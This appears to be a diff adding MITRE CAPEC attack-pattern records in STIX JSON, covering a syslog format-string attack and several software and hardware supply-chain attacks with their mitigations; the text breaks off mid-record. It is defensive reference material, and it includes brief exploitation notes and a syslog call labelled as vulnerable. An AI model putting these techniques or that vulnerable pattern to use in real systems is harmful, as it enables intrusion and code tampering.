    The formatting characters %s and %d are useful for observing memory and trying to print memory addresses. If an adversary has access to the log being written to they can observer this output and use it to help craft their attack.
    The formatting character %n is useful for adding extra data onto the buffer.

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary supplies the program with the crafted format string injection, causing a buffer.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The Syslog function is used without specifying a format string argument, allowing user input to be placed direct into the function call as a format string." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():\n syslog(LOG_ERR, \"%s\", cmdBuf);\n The following code shows a vulnerable usage of Syslog():\n syslog(LOG_ERR, cmdBuf);\n // the buffer cmdBuff is taking user supplied data.\n \n \n ", + "id": "course-of-action--86561398-227b-435c-a522-9d43f3d2e16f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-67-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--72cfbe83-9260-4542-948f-17b8e7b1a1df", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86561398-227b-435c-a522-9d43f3d2e16f", + "spec_version": "2.1", + "target_ref": "attack-pattern--4cd18074-15c1-4206-8391-115685669623", + "type": "relationship", + "x_capec_version": "3.9" + }, + { 
+ "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with the ability to alter tools used in a development environment causes software to be developed with maliciously modified tools. Such tools include requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools. The adversary then carries out malicious acts once the software is deployed including malware infection of other systems to support further compromises.", + "external_references": [ + { + "external_id": "CAPEC-670", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/670.html" + }, + { + "description": "Trusted Developer Utilities Proxy Execution", + "external_id": "T1127", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1127" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor, 2020--12---13, Schneier on Security", + "external_id": "REF-667", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + } + ], + "id": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Software Development Tools Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Modify Data", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary with access to software build tools inside an Integrated Development Environment IDE alters a script used for downloading dependencies from a dependent code repository where the script has been changed to include malicious code implanted in the repository by the adversary." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a targeted developer’s development environment and in particular to tools used to design, create, test and manage software, where the adversary could ensure malicious code is included in software packages built through alteration or substitution of tools in the environment used in the development of software." + ], + "x_capec_skills_required": { + "High": "Ability to leverage common delivery mechanisms (e.g., email attachments, removable media) to infiltrate a development environment to gain access to software development tools for the purpose of malware insertion into an existing tool or replacement of an existing tool with a maliciously altered copy." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a security concept of operations (CONOPS) for the development environment that includes: Maintaining strict security administration and configuration management of requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools.", + "id": "course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-670-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--811480e0-f4e5-4e2a-8c32-b4c4872290a1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], 
+ "relationship_type": "mitigates", + "source_ref": "course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a", + "spec_version": "2.1", + "target_ref": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid giving elevated privileges to developers.", + "id": "course-of-action--b2679adf-476c-4be7-b2ea-c1cb155f9145", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-670-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--59b5ad85-0960-462a-b666-4bbdcb872db3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b2679adf-476c-4be7-b2ea-c1cb155f9145", + "spec_version": "2.1", + "target_ref": "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with access to functional requirements for an application specific integrated circuit (ASIC), a chip designed/customized for a singular particular use, maliciously alters requirements derived from originating capability needs. 
In the chip manufacturing process, requirements drive the chip design which, when the chip is fully manufactured, could result in an ASIC which may not meet the user’s needs, contain malicious functionality, or exhibit other anomalous behaviors thereby affecting the intended use of the ASIC.", + "external_references": [ + { + "external_id": "CAPEC-671", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/671.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Requirements for ASIC Functionality Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary with access to ASIC functionality requirements for various customers, targets a particular customer’s ordered lot of ASICs by altering its functional requirements such that the ASIC design will result in a manufactured chip that does not meet the customer’s capability needs." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a foundry’s or chip maker’s requirements management system that stores customer requirements for ASICs, requirements upon which the design of the ASIC is based." + ], + "x_capec_skills_required": { + "High": "An adversary would need experience in designing chips based on functional requirements in order to manipulate requirements in such a way that deviations would not be detected in subsequent stages of ASIC manufacture and where intended malicious functionality would be available to the adversary once integrated into a system and fielded." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize DMEA’s (Defense Microelectronics Activity) Trusted Foundry Program members for acquisition of microelectronic components.", + "id": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "spec_version": "2.1", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for hardware requirements and design.", + "id": "course-of-action--763090ea-507b-4958-869c-ecfd797d6d26", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2b255e16-36f0-474d-bfe4-bd6900df7834", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--763090ea-507b-4958-869c-ecfd797d6d26", + "spec_version": "2.1", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require that provenance of COTS microelectronic components be known whenever procured.", + "id": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": 
"mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "spec_version": "2.1", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Conduct detailed vendor assessment before acquiring COTS hardware.", + "id": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f207532a-5fc8-4c50-a7ee-cacc0092f6d7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "spec_version": "2.1", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n During the programming step of chip manufacture, an adversary with access and necessary technical skills maliciously alters a chip’s intended program logic to produce an effect intended by the adversary when the fully manufactured chip is deployed and in operational use. 
Intended effects can include the ability of the adversary to remotely control a host system to carry out malicious acts.\n ", + "external_references": [ + { + "external_id": "CAPEC-672", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/672.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Code Implanted During Chip Programming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Following a chip’s production process steps of test and verification and validation of chip circuitry, an adversary involved in the generation of microcode defining the chip’s function(s) inserts a malicious instruction that will become part of the chip’s program. 
When integrated into a system, the chip will produce an effect intended by the adversary.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a foundry’s or chip maker’s development/production environment where programs for specific chips are developed, managed and uploaded into targeted chips prior to distribution or sale." + ], + "x_capec_skills_required": { + "Medium": "An adversary needs to be skilled in microprogramming, manipulation of configuration management systems, and in the operation of tools used for the uploading of programs into chips during manufacture. Uploading can be for individual chips or performed on a large scale basis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--28128c02-5503-416d-842c-89eb9c15bd31", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "spec_version": "2.1", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management of microcode and microcode generating tools and software.", + "id": "course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-672-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": 
"course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--89691446-aa5b-4b3c-9328-d26c0db95284", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186", + "spec_version": "2.1", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bfab0ef2-0fc0-4e7c-a0a5-2eed4b5e3aa0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "spec_version": "2.1", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02819a54-8939-497c-b2eb-faaac80cabf0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "spec_version": "2.1", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Software produced by a reputable developer is clandestinely infected with 
malicious code and then digitally signed by the unsuspecting developer, where the software has been altered via a compromised software development or build process prior to being signed. The receiver or user of the software has no reason to believe that it is anything but legitimate and proceeds to deploy it to organizational systems.\n This attack differs from CAPEC-206, since the developer is inadvertently signing malicious code they believe to be legitimate and which they are unware of any malicious modifications.\n ", + "external_references": [ + { + "external_id": "CAPEC-673", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/673.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Defending Against Software Supply Chain Attacks, 2021--04, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-658", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/sites/default/files/publications/defending_against_software_supply_chain_attacks_508_1.pdf" + }, + { + "description": "Dr. Charles Clancy, Joe Ferraro, Robert A. Martin, Adam G. Pennington, Christopher L. Sledjeski, Dr. Craig J. 
Wiener, Deliver Uncompromised: Securing Critical Software Supply Chains, 2021--01, The MITRE Corporation", + "external_id": "REF-659", + "source_name": "reference_from_CAPEC", + "url": "https://www.mitre.org/publications/technical-papers/deliver-uncompromised-securing-critical-software-supply-chains" + } + ], + "id": "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Developer Signing Maliciously Altered Software", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Execute Unauthorized Commands" + ], + "Authorization": [ + "Gain Privileges", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Modify Data" + ], + "Integrity": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary who has infiltrated an organization’s build environment maliciously alters code intended to be included in a product’s software build via software dependency inclusion, part of the software build process. When the software product has been built, the developer electronically signs the finished product using their signing key. 
The recipient of the software product, an end user/customer, believes the software to reflect the developer’s intent with respect to functionality unaware of the adversary’s malicious intent harbored within.\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary would need to have access to a targeted developer’s software development environment, including to their software build processes, where the adversary could ensure code maliciously tainted prior to a build process is included in software packages built." + ], + "x_capec_skills_required": { + "High": "The adversary must have the skills to infiltrate a developer’s software development/build environment and to implant malicious code in developmental software code, a build server, or a software repository containing dependency code, which would be referenced to be included during the software build process." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a security concept of operations (CONOPS) for the IDE that includes: Protecting the IDE via logical isolation using firewall and DMZ technologies/architectures; Maintaining strict security administration and configuration management of configuration management tools, developmental software and dependency code repositories, compilers, and system build tools.", + "id": "course-of-action--22c445d7-8a0c-4c4a-82be-e6a3a23980f6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-673-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--8158f676-c4e7-47f8-94d3-fce6ae844da7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22c445d7-8a0c-4c4a-82be-e6a3a23980f6", + "spec_version": "2.1", + "target_ref": "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ intrusion detection and malware detection capabilities on IDE systems where feasible.", + "id": "course-of-action--a96e3d7b-96fe-4a3c-bc99-11721b0042f7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-673-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e27a3eac-c3d2-4400-b058-e2708bb41600", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a96e3d7b-96fe-4a3c-bc99-11721b0042f7", + "spec_version": "2.1", + "target_ref": "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the functionality of a field-programmable gate array (FPGA) by causing an FPGA configuration memory chip reload in order to introduce a malicious function that could result in the FPGA performing or enabling malicious functions on a host system. 
Prior to the memory chip reload, the adversary alters the program for the FPGA by adding a function to impact system operation.\n ", + "external_references": [ + { + "external_id": "CAPEC-674", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/674.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Design for FPGA Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ 
+ "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An adversary with access and the ability to alter the configuration/programming of FPGAs in organizational systems, introduces a trojan backdoor that can be used to alter the behavior of the original system resulting in, for example, compromise of confidentiality of data being processed.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to FPGA programming/configuration-related systems in a chip maker’s development environment where FPGAs can be initially configured prior to delivery to a customer or have access to such systems in a customer facility where end-user FPGA configuration/reconfiguration can be performed." + ], + "x_capec_skills_required": { + "High": "An adversary would need to be skilled in FPGA programming in order to create/manipulate configurations in such a way that when loaded into an FPGA, the end user would be able to observe through testing all user-defined required functions but would be unaware of any additional functions the adversary may have introduced." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a4ab3ee8-bb69-4118-8ae0-48c15fa7c16d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "spec_version": "2.1", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for FPGA programming and program uploads to FPGA chips.", + "id": "course-of-action--d9c23bac-b643-4817-b0e5-0b21f4c2dae6", + "modified": 